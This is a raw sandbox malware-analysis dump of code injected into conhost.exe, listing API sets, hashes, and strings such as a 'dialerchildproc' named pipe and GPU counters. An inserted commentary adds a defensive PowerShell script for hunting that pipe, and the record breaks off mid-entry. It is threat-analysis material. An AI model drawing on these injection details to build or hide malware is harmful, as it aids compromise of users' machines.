                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D395
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D3A6
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 570795689-0
                                                                  • Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction ID: 018e45ed5d0ed26c29d58a38f4c483b10dcb84a5632e802c6b367016c1ffb8cc
                                                                  • Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction Fuzzy Hash: A0412C3074525442F9B8A73F97DDBAB2A465B45BB0F1C0B249F3606ED7DA7894C29E00

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Running Time
                                                                  • API String ID: 1943346504-1805530042
                                                                  • Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction ID: c7feb7eedf3b9f8621111a5b22029b9d0b2d99cae8fab2b120657999524fec73
                                                                  • Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction Fuzzy Hash: 1E318432700A5086F730CF2BAA8C75AA7A0F788F95F4845299F4943E65DF38D4A68B40

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                                  • API String ID: 1943346504-3507739905
                                                                  • Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                                  • Instruction ID: bf10483d32a2d2cf22a671d4f479baa62898e7a4f68aa7f43a9cd7687d0f8bb7
                                                                  • Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                                  • Instruction Fuzzy Hash: 62314D31714B5186F760DF2BAACCB5AA7A1F784F95F084129DF8A43B25DF38D4968B00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction ID: 8a582c266cdb55b462c407256a536ff97da4f752aa46bd1d958f90a90b4f8d2e
                                                                  • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction Fuzzy Hash: 3CE19D72A05B408AEB62EF69D68C39E37A0F759B98F100115EFC957B99CB34D5C2C708

                                                                  Control-flow Graph (function at 2408a29a974, described in the record below; the rendered graph distinguishes executed from not-executed basic blocks). Edge list omitted: the function imports no APIs and calls only internal subroutines (2408a29b844, 2408a29cb78, 2408a299a64, 2408a29ae4c, 2408a297d70, 2408a299e40, 2408a29a154, 2408a29a114, 2408a299ce4, 2408a29cad8, 2408a29a128, 2408a29b8dc, 2408a299d74, 2408a299f80, 2408a29b068, 2408a29a8a0, 2408a29b9cc, 2408a2996dc, 2408a29b424, 2408a2998d0).
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction ID: 8fad1136afd327382d3350423b59f1bba83968f396f9c5b3309f7737dd36f762
                                                                  • Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction Fuzzy Hash: ADE17E72704B408AEB34DB6AD68879E7BA4F749B98F180155EF8957F99CB34C5C1CB00

                                                                  Control-flow Graph (function at 2408a29f7c4, described in the record below; the rendered graph distinguishes executed from not-executed basic blocks). Edge list omitted: the graph resolves an export by calling LoadLibraryExW, falling back to GetLastError, two calls to the internal routine 2408a29cd58 and a second LoadLibraryExW, then GetProcAddress, with FreeLibrary on one path.
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeLibraryProc
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3013587201-537541572
                                                                  • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction ID: 2bb4b6e0430cd9218f75abc1b8face2e93e6c144a68c9879fb49ec7bbbb465af
                                                                  • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction Fuzzy Hash: 6E41B431315A2091FBB5DB1BAA88B563791BB49FA0F0C41259F0E87F84EB78D4C58B10

                                                                  Control-flow Graph (function at 2408a29104c, described in the record below; the rendered graph distinguishes executed from not-executed basic blocks). Edge list omitted: the graph calls RegQueryInfoKeyW once, then loops over RegEnumValueW, with GetProcessHeap, HeapAlloc, GetProcessHeap and HeapFree inside the loop body.
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                  • String ID: d
                                                                  • API String ID: 3743429067-2564639436
                                                                  • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction ID: 21cd235243b833449a4ff2f5587f61f8a2bf6707ba15beecc756b479bdd18fcc
                                                                  • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction Fuzzy Hash: DB415573214B84D6E7A0CF66E58879E7BA1F388F98F448119DB8907B58DF38D589CB40

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • FlsGetValue.KERNEL32(?,?,?,000002408A29CC0E,?,?,?,?,?,?,?,?,000002408A29D3CD,?,?,00000001), ref: 000002408A29D4B7
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A29CC0E,?,?,?,?,?,?,?,?,000002408A29D3CD,?,?,00000001), ref: 000002408A29D4D6
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A29CC0E,?,?,?,?,?,?,?,?,000002408A29D3CD,?,?,00000001), ref: 000002408A29D4FE
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A29CC0E,?,?,?,?,?,?,?,?,000002408A29D3CD,?,?,00000001), ref: 000002408A29D50F
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A29CC0E,?,?,?,?,?,?,?,?,000002408A29D3CD,?,?,00000001), ref: 000002408A29D520
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: 1%$Y%
                                                                  • API String ID: 3702945584-1395475152
                                                                  • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction ID: 5cc28e8d6b6a460314d486e035352944372e75f9644a07bfbf1f8cafb2dc8d04
                                                                  • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction Fuzzy Hash: 8011813034525042FA78972FA7DDB6B2A415B84BB4F5C4724AB3906ED7DE78D4C25F00

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                  • String ID: \\.\pipe\dialerchildproc
                                                                  • API String ID: 166002920-1933775637
                                                                  • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction ID: bbd292e3a311497343453d84250fdd13b35bec573ece26ebfdbd0d05645a45f2
                                                                  • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction Fuzzy Hash: 6F114F31714B5083E7208B26F54875A7761F789BA5F544315EB6A02EA8CF7CC189CF00
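The record above is the only place in this dump where the injected code names a host-visible object: it creates a named pipe, \\.\pipe\dialerchildproc, and talks to a child process over it (CreateFile, ReadFile, WriteFile, CreateProcess in the API ID). A pipe name is cheap to hunt for on live hosts, because Windows exposes every open named pipe under the \\.\pipe\ pseudo-directory. The script below is an added example, not part of the Joe Sandbox report or of the sample; the only value taken from the report is the pipe name. The optional owner lookup assumes Sysinternals handle.exe is on the PATH, which is an assumption for illustration, and the output column names are my own.

```powershell
# Added example, not from the report: hunt live hosts for the named pipe that
# the injected conhost.exe code creates. Only 'dialerchildproc' comes from the
# report; everything else here is illustrative.

$IocPipeNames = @('dialerchildproc')

function Get-OpenNamedPipe {
    # \\.\pipe\ enumerates every currently open named pipe on the machine.
    # A pipe only shows up while some process holds it open, so a miss does
    # not clear the host; pair this with a memory scan for the string.
    [System.IO.Directory]::GetFiles('\\.\pipe\') |
        ForEach-Object { $_ -replace '^\\\\\.\\pipe\\', '' }
}

function Find-IocNamedPipe {
    param(
        [string[]]$Names = $IocPipeNames,
        [switch]$ResolveOwner   # needs Sysinternals handle.exe on PATH (assumption)
    )
    foreach ($pipe in Get-OpenNamedPipe) {
        foreach ($ioc in $Names) {
            if ($pipe -ieq $ioc) {
                $owner = $null
                if ($ResolveOwner -and (Get-Command handle.exe -ErrorAction SilentlyContinue)) {
                    # handle.exe -a lists all handle types; the pipe shows up as
                    # \Device\NamedPipe\<name> under the owning process line.
                    $owner = (& handle.exe -accepteula -a -nobanner "\Device\NamedPipe\$pipe" 2>$null |
                              Where-Object { $_ -match 'pid:\s*(\d+)' } |
                              ForEach-Object { $Matches[1] }) -join ','
                }
                [pscustomobject]@{
                    Pipe     = "\\.\pipe\$pipe"
                    Matched  = $ioc
                    OwnerPid = $owner
                }
            }
        }
    }
}

# Run it; an empty result means no process currently holds the IOC pipe open.
Find-IocNamedPipe -ResolveOwner
```

Two caveats a responder should keep in mind. The pipe exists only for the lifetime of the injected code's parent/child handshake, so this is a live-triage check, not a forensic one; for dead-box work the string \\.\pipe\dialerchildproc in a conhost.exe private memory region is the better pivot. And a hit inside conhost.exe is itself anomalous regardless of the name: a console host has no business creating named pipes of its own, which is why the owning PID, when handle.exe can supply it, is worth recording alongside the match.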

                                                                  Control-flow Graph (function at 2408a297940, described in the record below; CRT start-up code per its API ID, and the rendered graph distinguishes executed from not-executed basic blocks). Edge list omitted: the graph contains the __scrt_dllmain_crt_thread_attach and __scrt_dllmain_after_initialize_c nodes, calls back into itself at 2408a297940 and at its own block 2408a297aa8, and otherwise calls only internal subroutines, no imported APIs.
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID:
                                                                  • API String ID: 190073905-0
                                                                  • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction ID: a9e9bb5328127e4d5f3f08f0d72b2a3f6a39a8029a23c9eb6b97e4965b81692f
                                                                  • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction Fuzzy Hash: 0681B43170064186FB78AB6F97D9B9B6B91A785F80F1C40259B4947F96DB38C9C78F00
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002408A29A3B3,?,?,?,000002408A299B9C,?,?,?,?,000002408A2996BD), ref: 000002408A29A279
                                                                  • GetLastError.KERNEL32(?,?,?,000002408A29A3B3,?,?,?,000002408A299B9C,?,?,?,?,000002408A2996BD), ref: 000002408A29A287
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002408A29A3B3,?,?,?,000002408A299B9C,?,?,?,?,000002408A2996BD), ref: 000002408A29A2B1
                                                                  • FreeLibrary.KERNEL32(?,?,?,000002408A29A3B3,?,?,?,000002408A299B9C,?,?,?,?,000002408A2996BD), ref: 000002408A29A2F7
                                                                  • GetProcAddress.KERNEL32(?,?,?,000002408A29A3B3,?,?,?,000002408A299B9C,?,?,?,?,000002408A2996BD), ref: 000002408A29A303
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                  • String ID: api-ms-
                                                                  • API String ID: 2559590344-2084034818
                                                                  • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction ID: de6f46274b704ba40738bf3eef57c5b6ad785ce075c2bcb14a505a1eb100e408
                                                                  • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction Fuzzy Hash: 2131C431702B4095EE329B4BAA88B562B94F708FA0F5D05259F1E07F91DF39D5C6CB00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                  • String ID: CONOUT$
                                                                  • API String ID: 3230265001-3130406586
                                                                  • Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                                  • Instruction ID: 28c1958d75fad3510e3d85040f47546b7a5e8836a2e4408dbab6e218ef05a4e7
                                                                  • Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                                  • Instruction Fuzzy Hash: 7E116032310B5086E7608B5BEA8831967A4F788BE5F044215EB6E87F94CF38E8848B40
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                  • String ID: wr
                                                                  • API String ID: 1092925422-2678910430
                                                                  • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction ID: 5e5a353675d72f869b81ff16ecbed8a03f8347fedfe551c5579f1f093f18abbd
                                                                  • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction Fuzzy Hash: F0118B36300B4182EB649B2AE58C76A66A1F788F94F080428DF8D03F94EF3DD5D88B04
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$Current$Context
                                                                  • String ID:
                                                                  • API String ID: 1666949209-0
                                                                  • Opcode ID: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                                  • Instruction ID: 846c293be091fd7fe1fd5e3779cccd28122c1c148bb8d23bf259577605930977
                                                                  • Opcode Fuzzy Hash: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                                  • Instruction Fuzzy Hash: 56D18876308B8886DA70DB1AE59875ABBA0F788F94F540116EBCD47BA5CF38C591CF10
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID: dialer
                                                                  • API String ID: 756756679-3528709123
                                                                  • Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                                  • Instruction ID: f8bcaffac90bfc331d76808b0ea06013533e61bff56cb75c28ecb3ca2b43f933
                                                                  • Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                                  • Instruction Fuzzy Hash: 4E318431B01B5182EB64DF6BE688B6A6BA1FB54F80F0840288F5847F55EF34D8F58B00
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,000002408A29DAE5,?,?,?,?,000002408A29DBA8), ref: 000002408A29D3DF
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A29DAE5,?,?,?,?,000002408A29DBA8), ref: 000002408A29D415
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A29DAE5,?,?,?,?,000002408A29DBA8), ref: 000002408A29D442
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A29DAE5,?,?,?,?,000002408A29DBA8), ref: 000002408A29D453
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A29DAE5,?,?,?,?,000002408A29DBA8), ref: 000002408A29D464
                                                                  • SetLastError.KERNEL32(?,?,?,000002408A29DAE5,?,?,?,?,000002408A29DBA8), ref: 000002408A29D47F
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 2506987500-0
                                                                  • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction ID: 2f6d3f41572074dbf797a3b89f2bab5dad8723c2f0bdf8ccaf074c688e9ccf9d
                                                                  • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction Fuzzy Hash: 1711513034525042FA78972F97DDB6A2A525B44FF0F1817249F3607ED7DA7894C25E00
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID:
                                                                  • API String ID: 517849248-0
                                                                  • Opcode ID: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
